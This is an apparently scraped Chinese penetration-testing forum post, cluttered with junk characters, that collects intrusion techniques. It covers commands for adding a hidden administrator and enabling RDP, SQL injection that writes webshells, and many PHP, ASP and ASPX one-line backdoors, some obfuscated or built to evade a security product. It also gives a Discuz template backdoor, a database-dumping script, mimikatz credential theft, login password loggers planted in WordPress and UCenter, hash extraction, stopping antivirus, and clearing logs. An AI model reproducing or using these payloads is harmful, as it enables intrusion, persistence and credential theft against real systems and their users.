7 i' a6 z/ ]" _& g' L/ d3 _4 u; ymstsc的参数：
) ~7 J; ^4 }8 B7 T0 ?. O
远程桌面连接
7 O+ s) \% |) O1 v" Z
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
  d3 Y1 q: {: @( Y# X  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
  _  n5 a; Y# e, H; f
- g8 n% H1 Q$ @0 p<Connection File> -- 指定连接的 .rdp 文件的名称。
" r: Q- A/ j5 Q0 N
/v:<server[:port]> -- 指定要连接到的终端服务器。
* D4 O% j% s' i9 A6 G1 T2 u
/console -- 连接到服务器的控制台会话。

/f -- 以全屏模式启动客户端。

/w:<width> --  指定远程桌面屏幕的宽度。
: k2 {. Q! B+ G9 m/ ~  H7 ?
' r- T3 x, h/ Y/h:<height> -- 指定远程桌面屏幕的高度。

& c; v/ w* e" x1 V! U) c: t# o% [2 I/edit -- 打开指定的 .rdp 文件来编辑。

/migrate -- 将客户端连接管理器创建的旧版
连接文件迁移到新的 .rdp 连接文件。


; `+ _: X$ n2 E9 ?1 E其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
/ K- j. U* {8 `mstsc /console /v:124.42.126.xxx 突破终端访问限制数量

  D3 z$ f2 p0 n& n1 ?  Q, ]命令行下开启3389
net user asp.net aspnet /add
, L# `% j/ W. t, m6 r5 e, Enet localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
/ m) `0 I) z7 I; G0 `( z% Lattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
8 ~- {9 r- K  Q% zecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
' ^% M. I, v% Ssc config rasman start= auto
4 B9 B; w) E! D/ L" v, l9 dsc config remoteaccess start= auto
net start rasman
" a# Y1 y* ?2 G* G; Onet start remoteaccess
1 k6 A9 q7 O3 N6 u- @* |Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
+ m# I' L. v) q+ |9 w2 g" Z3 ]! T. y<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2 查看用户的密码
access数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
7 q9 }8 S5 t* y9 ^9 u# h测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
8 E7 l, v& J0 {8 z- |4 p
  @& e4 @, a8 N0 o) S2 A9 D测试2：

! y0 E0 A; C) V9 l; i5 n4 Gcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
% C  \; ^+ l$ `8 ~5 e
' a6 N$ L/ ]) y7 w6 ~6 Ydelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
  p# E% Z1 C, P8 H: f+ N
# k) J0 l/ I; ]2 OSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
! ^0 [% r% c# I" j: z可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
# Q" {' M1 |+ m, E* U6 w" r7 a5 k: [net stop mcafeeframework
6 T$ L( a  M! J9 ~net stop mcshield
net stop mcafeeengineservice
# r/ w; h$ K5 S4 }6 dnet stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
! e( k0 }) h9 f) [
  VNCDump.zip (4.76 KB, 下载次数: 1)
密码在线破解http://tools88.com/safe/vnc.php
VNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取

( |. ^$ z, B  O% P" E* Kexec master..xp_cmdshell 'net user'
% P% j$ y; @2 n1 k: k) h- Hmssql执行命令。
: ^2 W# y/ B# J$ j: S. G/ e0 Q获取mssql的密码hash查询
9 |, J( v/ {. g; b3 G6 s& _8 b& tselect name,password from master.dbo.sysxlogins
( n' _! g& m: p% f9 R! G7 S# H/ Q
  ?- l) Z$ s; M0 z, Nbackup log dbName with NO_LOG;
3 ]+ G0 D* R- P& ?7 v* @backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
/ r, M4 q3 H2 N) @mssql数据库压缩
/ @* j1 \. A/ u+ d3 B  w
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。
# W5 T% F7 B/ u; l$ `
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak

6 [) O1 K% e9 x7 W9 E6 m0 Q' WDiscuz！nt35渗透要点：
（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
（3）保存。
（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
d:\rar.exe a -r d:\1.rar d:\website\
" P8 A, x) e. M$ _递归压缩website
注意rar.exe的路径
: Y: X, n6 W* I% M7 H
<?php
7 ?/ u: C* H$ j8 u4 m
1 [; {6 m& X! u# J  z0 \$telok   = "0${@eval($_POST[xxoo])}";

. ?! _5 g! n+ |- A5 m$username   = "123456";
% I. P0 U6 a8 h- Z' E) C$ ^* ^
4 j: G! [: H- B7 U$userpwd   = "123456";
; w0 X" I) i$ C  {
$telhao   = "123456";

- q8 d# e, f0 f2 [$telinfo   = "123456";
  A' E! e% V: p8 |' n+ ~
?>
php一句话未过滤插入一句话木马

站库分离脱裤技巧
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
$ _! v/ \5 V4 c" g7 w; j) _exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
$ L8 e: n; W/ L条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
这儿利用的是马儿的专家模式（自己写代码）。
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
. g( \" X, F/ P; W8 M" E5 W* ~1 r$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
, @" E0 \  E; x) [mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
# d: a# q4 p' R. m7 P$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
2 `( D# G# z+ Y8 r1 q/ e9 S# C    $tmp .=  implode("::", $row)."\n";
    if(!($i%500)){//500条写入一个文件
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
; w' z# q2 x7 t2 ]3 ]1 G4 c        $tmp = '';
: z$ b$ d: O' w: O( K    }
}
mysql_free_result($result);
2 ?) h0 C0 Z+ j- ?% B

$ o. ^) I0 P  \% A, L
' e! R& j# R2 e, k& G5 G' T+ E7 ^, g//down完后delete
8 x% T) _! g" Z5 a) T% O
, j3 g$ B, p  K/ _; a5 m( ]
% @; R* K5 T' t9 I6 B. E3 }' tini_set('display_errors', 1);
error_reporting(E_ALL);
6 g5 M& W" a* C4 n: [; [$i = 0;
3 I/ j: c% e; p' b6 O7 R& ?while($i<32) {
    $i = $i+1;
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
        unlink($filename);
' g$ [' B& i; o1 Q/ {6 T5 h; K}
, v8 p  @  J2 Z1 Mhttprint 收集操作系统指纹
扫描192.168.1.100的所有端口
nmap –PN –sT –sV –p0-65535 192.168.1.100
host -t ns www.owasp.org 识别的名称服务器，获取dns信息
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
Netcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host
3 r6 m8 W! y3 O% ~- W
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
( L+ ]# @, X9 g  `8 `
1 v' s/ t: b0 f5 V: z+ i　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)

2 j9 n$ r. [* U" U: ^5 h6 V　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x

　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
/ F8 G' X/ q3 x2 t/ @0 F
' H* m3 S" O  C( i5 i; J　　http://net-square.com/msnpawn/index.shtml (要求安装)

( q, U; T+ x" x; K+ G- e# I　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
7 X8 C: @7 g1 K  l: f
　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- v. Z4 a$ q0 W8 mset names gb2312
+ E/ o; G6 m# }# Y/ ^导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。

8 ^8 K. J. M/ K& F) p7 B5 |mysql 密码修改
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
update user set password=PASSWORD('antian365.com') where user='root';
# A( a5 G$ R1 N) q" ~- wflush privileges;
高级的PHP一句话木马后门

入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀

1、
( @( T* s( x. r4 L6 m% g. q) K# ?
6 U' m% z; [; n% W2 R$ C0 o$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
8 ^5 }& H; f0 l4 m, G
$hh("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话
. s" S" Q$ F9 K* u
$ d* k& c" T2 J0 H/ ^2、
+ F+ V: u5 ~+ {! y" M, L
$filename=$_GET['xbid'];
7 T' S8 p$ Y4 D# y0 Y3 E
include ($filename);
8 ~+ `( G5 x1 d! Y
//危险的include函数，直接编译任何文件为php格式运行

3、

$reg="c"."o"."p"."y";
! r2 O3 b4 o& ?& [/ B
, F/ |+ N. _$ B1 \6 N5 E$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

4、

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
& z: j8 ^% ~1 Y4 m% G
  u+ B4 G$ C) s7 F  C2 K# Q7 E7 K8 i$gzid("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话
* q5 H3 s1 W4 q( g* V; [' G0 p8 T
5、include ($uid);

//危险的include函数，直接编译任何文件为php格式运行，POST


" e& c- V$ p3 ?0 ?; Z//gif插一句话
, @: z# Y' A+ g
6、典型一句话
" {' u% {$ ^& s+ \& t/ e
7 B! h! y% t: G0 Q- O  t程序后门代码
( C% c6 `- f2 {8 y  G1 D5 p<?php eval_r($_POST[sb])?>
* r: U! `0 a9 V. m3 m) a( M+ r程序代码
) q+ |% E- o( |( |9 s<?php @eval_r($_POST[sb])?>
+ F6 [  L" g1 q/ d) N//容错代码
- O" r: o8 Z. r5 v! |5 F程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
4 p  n" P% ~, w$ N' b<?$_POST['sa']($_POST['sb']);?>
7 q9 g% V( P- t# u3 M$ m4 ?7 [9 b程序代码
( y, h- ~: u0 P5 B) a<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
+ _+ f" _* O, f@preg_replace("/[email]/e",$_POST['h'],"error");
?>
" n7 U, _) e( j8 [( [' U& W3 s//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
* O- e, u; \- z4 v程序代码
<O>h=@eval_r($_POST[c]);</O>
% S# M& I* _6 Y8 P/ R: T程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话
  k  ^6 C3 {3 S8 p
9 N; r$ _1 L3 ]2 C7 E! k5 Thttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
详细用法：
1、到tools目录。psexec \\127.0.0.1 cmd
( r% S0 _/ E. i  j, R  N" I, C1 ^/ c6 p2、执行mimikatz
; G1 X8 \/ ?: R# O: _! X9 y. w3、执行 privilege::debug
, u' K+ R; v3 ?) W2 ?# H4、执行 inject::process lsass.exe sekurlsa.dll
5、执行@getLogonPasswords
" q/ w2 j; d+ ~' R  R6、widget就是密码
7、exit退出，不要直接关闭否则系统会崩溃。

http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
$ E' x& R, e( j) p6 {
自动查找系统高危补丁
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

突破安全狗的一句话aspx后门
+ \% a, n8 w/ \<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
webshell下记录WordPress登陆密码
% I% a' w. ^9 i# L( `/ Qwebshell下记录Wordpress登陆密码方便进一步社工
在文件wp-login.php中539行处添加：
, F4 U! L2 K1 w+ `# P4 h// log password
3 f7 A; O6 c$ w! p6 x/ P5 ~4 w$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
$txt=$txt.”\r\n”;
6 T5 E1 b1 g7 @( g% D: _if($log_user&&$log_pwd&&$log_ip){
' u* u. |! B$ J  B+ |@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
}
6 E1 O# `" Z7 Y3 l当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
就是搜索case ‘login’
在它下面直接插入即可，记录的密码生成在pwd.txt中，
- j: ?. x4 A' x' `; E7 H* N其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
利用II6文件解析漏洞绕过安全狗代码：
0 `% P* q; W+ ^& e  o( k;antian365.asp;antian365.jpg

' @1 s: \- l6 t) B; I/ _% ]各种类型数据库抓HASH破解最高权限密码！
- q6 m9 b6 o5 [# X& t1.sql server2000
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
: \3 S! l' a1 b* {* f4 c0 L! M993BF231-salt
8 `) }$ A! L- a& \5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
4 c1 {6 V& ^0 o' t/ B1 Icrack case sensitive hash in cain, try brute force and dictionary based attacks.

8 M; j7 @% w0 S/ l- j: wupdate:- following bernardo’s comments:-
+ ~# B. o, C& Q: g! j0 N4 tuse function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

+ Y: w5 J$ C% t& n8 YMYSQL:-
1 y; ^% C! ~. N1 v5 v& N5 O
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql  < 4.1

mysql> SELECT PASSWORD(‘mypass’);
! L7 }/ ^" G& N; k) Q) K+——————–+
) a4 G2 y2 }8 n8 X- q! ?0 p| PASSWORD(‘mypass’) |
1 g) ~+ o/ f+ P% [9 C+——————–+
/ m; A. E8 {) O" ]9 \* I| 6f8c114b58f2ce9e   |
0 A4 W+ o  ]; C% T+——————–+

, Y. V# i2 X: L- {% |" U: Y0 `1 {*mysql >=4.1
! N, C- `9 B  w: W: f# J
mysql> SELECT PASSWORD(‘mypass’);
8 W6 t* |% a- E+——————————————-+
| PASSWORD(‘mypass’)                        |
+——————————————-+
6 v# r7 h) l5 H: [| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+

Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’
$ w' I) q+ M8 Q# a+ [/ q
Postgres:-
% _7 Y+ O, x6 `% k$ [# C8 fPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
. N3 l( L, V7 Y3 b5 b' Xselect usename, passwd from pg_shadow;
6 `: l! z) l. X% U4 }usename      |  passwd
& g8 i. m2 D9 ]9 ?0 o——————+————————————-
# m4 T4 `" }/ W, {/ }5 E8 J' K  Gtestuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
9 ^# q" L. P  O$ V
Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
- [# B9 O0 w/ I/ x* H9 o* LMore on Oracle later, i am a bit bored….
- b5 q* e& U1 K& e% i1 \/ }+ M1 t7 I4 O
# |0 e; w" h4 t
+ p9 ^) y4 y! L在sql server2005/2008中开启xp_cmdshell
-- To allow advanced options to be changed.
6 U, L, _: D  {/ @. AEXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
: B& D4 O6 \( n9 s% e' mGO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL 2008 server日志清除，在清楚前一定要备份。
如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
2 \- q9 _: c1 O) ~. a) _- ^Ｘ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
( K: [1 N: F& S* A; N- e7 T" a
对于SQL Server 2008以前的版本：
SQL Server 2005:
! k  v0 T" d# y3 b* Z- T删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
8 t3 x6 t7 G2 t" E2 W& jSQL Server 2000:
1 V4 q4 R6 u5 i( M2 x4 f8 A9 }% ^清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
+ N8 M$ I! \( X; s) ]
" g3 k% _( V2 P9 t2 Z4 m- E本帖最后由 simeon 于 2013-1-3 09:51 编辑
3 U7 ?& e+ P5 f( e9 I$ h

windows 2008 文件权限修改
5 z/ N4 r: A) H$ x% ]; h1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
4 z' f, S7 e: v0 W" H2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
  F2 p( n* x1 e5 S) @* F& j一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，
- s( _* {: n  F2 |: R
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
! O0 M* I2 u3 ^; e@="管理员取得所有权"
: f, w9 R* h) |0 Q* _"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
7 G# ^$ m' i( p"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, T6 l3 {! x0 @9 Z! v3 ^# L"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
; d5 }8 s1 y2 Z# o0 e@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. d0 `* B3 Z! x( {. r"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
% L/ T' q; N% O" K
7 i3 ]% \$ u. M$ K3 d0 m! d
; [1 {+ R4 x7 r) k) Mwin7右键“管理员取得所有权”.reg导入
二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
1、C:\Windows这个路径的“notepad.exe”不需要替换
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
3、四个“notepad.exe.mui”不要管
' h% W' Z3 M) \/ F! t4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
5 |$ ]+ _+ N  y( D+ F* r& DC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
6 T$ R" ?, E1 T; j+ P替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
! g) q' D; p- r  Q8 p9 F* s# H: Rwindows 2008中关闭安全策略：
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
& e9 N) X9 D- a+ l: |修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
/ h9 b' ~' W& s6 b6 C/ _下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
& i+ B9 n* p; M2 \你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
3 Z0 p1 g; P& J" tif(getenv('HTTP_CLIENT_IP')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
# @: `) P  x1 ~  R/ w+ _0 Z} elseif(getenv('REMOTE_ADDR')) {
$onlineip = getenv('REMOTE_ADDR');
' a+ d3 G1 G/ B% N1 ?) L# {} else {
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
  _7 \( @! M( e1 y# s- R/ Z     $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
# c- z) E# a# S    $handle=fopen('./data/cache/csslog.php','a+');
' U! N+ ?$ A: M9 X% `    $write=fwrite($handle,$record);

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2